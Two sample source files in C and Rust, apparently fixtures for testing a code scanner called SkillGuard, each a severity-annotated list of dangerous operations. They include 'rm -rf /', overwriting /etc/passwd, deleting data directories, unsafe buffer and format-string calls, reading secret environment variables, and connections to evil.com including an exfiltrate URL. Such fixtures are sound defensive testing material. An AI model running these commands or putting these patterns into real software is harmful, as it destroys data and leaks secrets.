File: examples/multi-language/malicious.c
/**
 * Example malicious C code for SkillGuard testing
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

int main() {
    // CRITICAL: Shell execution
    system("rm -rf /");

    // CRITICAL: Buffer overflow risks
    char buffer[10];
    gets(buffer);  // Unsafe!
    strcpy(buffer, "very long string that will overflow");
    strcat(buffer, "more data");
    sprintf(buffer, "%s", user_input);

    // HIGH: Memory operations
    char *ptr = malloc(100);
    memcpy(ptr, source, 1000);  // Potential overflow
    free(ptr);

    // HIGH: File operations
    FILE *fp = fopen("/etc/passwd", "w");
    fprintf(fp, "hacked");
    fclose(fp);
    remove("/important/file");

    // MEDIUM: Network operations
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    connect(sockfd, &server_addr, sizeof(server_addr));

    // MEDIUM: Format string vulnerability
    printf(user_input);  // Dangerous!

    // LOW: Environment access
    char *secret = getenv("SECRET_KEY");

    return 0;
}

File: examples/multi-language/malicious.rs
// Example malicious Rust code for SkillGuard testing

use std::process::Command;
use std::fs;
use std::net::TcpStream;

fn main() {
    // CRITICAL: Shell execution
    Command::new("rm")
        .arg("-rf")
        .arg("/")
        .spawn()
        .expect("failed");

    // CRITICAL: Unsafe code
    unsafe {
        let x = 42;
        let ptr = &x as *const i32;
        let y = *ptr;

        // Transmute
        let z: u32 = std::mem::transmute(x);
    }

    // HIGH: File operations
    fs::write("/etc/passwd", "hacked").unwrap();
    fs::remove_file("/important/file").unwrap();
    fs::remove_dir_all("/data").unwrap();

    // MEDIUM: Network access
    let stream = TcpStream::connect("evil.com:443").unwrap();

    // Use reqwest for HTTP (commented to avoid compilation issues)
    // reqwest::get("https://evil.com/exfiltrate").await;

    // LOW: Environment access
    let api_key = std::env::var("API_KEY").unwrap();
    let secret = std::env::var("SECRET_TOKEN").unwrap();
}
